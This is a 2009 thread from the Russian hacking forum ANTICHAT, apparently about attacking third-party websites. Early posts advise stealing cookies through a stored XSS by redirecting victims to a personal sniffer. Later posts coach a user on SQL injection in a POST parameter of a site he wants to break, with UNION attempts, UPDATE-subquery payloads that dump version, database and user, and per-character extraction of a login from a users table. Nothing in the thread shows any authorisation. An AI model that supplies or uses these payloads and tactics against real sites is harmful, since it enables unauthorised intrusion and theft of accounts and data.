ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
03.08.2009, 16:17
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Ты не догоняешь, это - активная XSS, читай мой пост выше про активки, какой смысл тырить только рефа, если можно стырить все куки. Реф и так тырица в нормальных снифах по умолчанию
|
|
|
03.08.2009, 16:21
|
|
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
Провел на форуме:
3300342
Репутация:
165
|
|
Сообщение от Pashkela
Ты не догоняешь, это - активная XSS, читай мой пост выше про активки, какой смысл тырить только рефа, если можно стырить все куки. Реф и так тырица в нормальных снифах по умолчанию
Но вот только форум тот где XSS, кроме бана и антифлуда в кеш больше не что не записывает
|
|
|
|
03.08.2009, 16:24
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Тогда да, будет достаточно рефа схватить, тогда вопрос не понятен вообще к чему - еще раз - в любом нормальном снифаке реф тырица и так по умолчанию, например в снифере от того же каника.
Просто ставишь перенаправление на свой снифак и всё, только не забудь потом чувака обратно вернуть 
ЗЫЖ И не называй куки кэшом, это разные вещи
Последний раз редактировалось Pashkela; 03.08.2009 в 16:27..
|
|
|
|
04.08.2009, 13:08
|
|
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763
Репутация:
1680
|
|
Значит у меня к вам следующий вопрос ©
Нашёл SQL на нужном мне сайте в POST запросе.
Воткнув обычную ковычку выскочило:
Код:
{"error":"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\\'' at line 1"}
Во первых почему то запрос взялся в фигурные скобки...
Дальше попробовал подобрать количество столбцов:
add=-1'+UNION+SELECT+1/*
и так
add=-1+UNION+SELECT+1/*
и так
add=-1'+UNION+SELECT+1--
и так
add=-1'+UNION+SELECT+1#
Ошибка SQL оставалась всё та-же, то есть нигде не было уведомления про несовпадения столбцов, как бы я не пытался...
Далее подставив вместо запроса:
add=lol
Я получаю:
{"error":"Unknown column 'ass' in 'where clause'"}
В общем у кого есть какие идеи по объеденению столбцов, то напишите как правильно в моём случае их сделать...
Может тут что фильтруется? |
|
|
|
04.08.2009, 13:21
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Вроде это сведетельствует о том, что magic_quotes_gpc используется вместе с addslashes, т.к. после экранирования кавычки мэджиками, идет экранирование слеша (я могу ошибаться)...
Далее подставив вместо запроса:
add=lol
Я получаю:
{"error":"Unknown column 'ass' in 'where clause'"}
Подставь другой текст, ass так же?
Во первых почему то запрос взялся в фигурные скобки...
Ну мб вывод ошибки типа
PHP код:
...
echo '{"error":"'.mysql_error().'"}';
...
|
|
|
|
04.08.2009, 13:24
|
|
Участник форума
Регистрация: 17.05.2008
Сообщений: 102
Провел на форуме:
1054394
Репутация:
74
|
|
А может это не селект а update запрос?
Судя по названия переменной адд
А может инсерт вовсе...
|
|
|
|
04.08.2009, 13:30
|
|
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763
Репутация:
1680
|
|
Сообщение от mailbrush
Подставь другой текст, ass так же?
Тут я ошибся, в переменной add= содержится цифровой номер колонки, какое бы значение не подставить, такое и отобразится на экране.
Вот только не знаю влияет ли это на SQL или нет.
А по поводу magic_quotes_gpc используется вместе с addslashes, что тут можно предпринять, или дохлый номер?
Судя по всему запрос и есть Update потому как он POST`om отправляет заказ на сайт
|
|
|
|
04.08.2009, 16:02
|
|
Участник форума
Регистрация: 17.05.2008
Сообщений: 102
Провел на форуме:
1054394
Репутация:
74
|
|
ну если он UPDATE то union select не прокатит!
с помощью юнион можно только объединить два SELECT запроса.
по идеи там запрос типа
UPDATE blabla SET bla_par={$_POST['add']} bla..... WHERE bla......
Поюзать ты сможешь если: сможешь потом получится посмотреть то что проапдейтил!
Не плохо было б знать какие еще это запрос изменяет поля.А вообще подзапросы в помощь.
пример
UPDATE blabla SET bla_par=(SELECT version()) WHERE tratata....-- bla..... WHERE bla......
или ты к примеру знаешь что этот же запрос апдейтит текстовое поле name
UPDATE blabla SET bla_par=1, name=(SELECT concat_ws(0x3a,version(),database(),user()) WHERE tratata -- bla..... WHERE bla......
лучше конечно взглянуть бы в сорцы если это возможно что б иметь представление о структуре запроса
извените если сказал бред (=
АПД: или юзай more than 1 rows https://forum.antichat.ru/threadnav35207-1-10.html
АПД2:
UPDATE table SET add=(SELECT ASCII( substring( (SELECT login FROM users WHERE id=1 ),3,1) )) WHERE id=1
вот пример запроса с инъекцией(жирным наш код)
перебираем по одному символы. Это конечно если можно глянуть результат апдейта.
Последний раз редактировалось xa-xa89; 04.08.2009 в 17:05..
|
|
|
|
04.08.2009, 18:11
|
|
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
Провел на форуме:
11338585
Репутация:
441
|
|
Сообщение от xa-xa89
ну если он UPDATE то union select не прокатит!
с помощью юнион можно только объединить два SELECT запроса.
по идеи там запрос типа
UPDATE blabla SET bla_par={$_POST['add']} bla..... WHERE bla......
Поюзать ты сможешь если: сможешь потом получится посмотреть то что проапдейтил!
Не плохо было б знать какие еще это запрос изменяет поля.А вообще подзапросы в помощь.
пример
UPDATE blabla SET bla_par=(SELECT version()) WHERE tratata....-- bla..... WHERE bla......
или ты к примеру знаешь что этот же запрос апдейтит текстовое поле name
UPDATE blabla SET bla_par=1, name=(SELECT concat_ws(0x3a,version(),database(),user()) WHERE tratata -- bla..... WHERE bla......
лучше конечно взглянуть бы в сорцы если это возможно что б иметь представление о структуре запроса
извените если сказал бред (=
АПД: или юзай more than 1 rows https://forum.antichat.ru/threadnav35207-1-10.html
АПД2:
UPDATE table SET add=(SELECT ASCII( substring( (SELECT login FROM users WHERE id=1 ),3,1) )) WHERE id=1
вот пример запроса с инъекцией(жирным наш код)
перебираем по одному символы. Это конечно если можно глянуть результат апдейта.
и часто ты такое видел?..чтобы знач не в кавычках шло?..не считая int..?
|
|
|
|
04.08.2009, 18:21
|
|
Участник форума
Регистрация: 17.05.2008
Сообщений: 102
Провел на форуме:
1054394
Репутация:
74
|
|
add= содержится цифровой номер колонки
судя по этому инт!
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
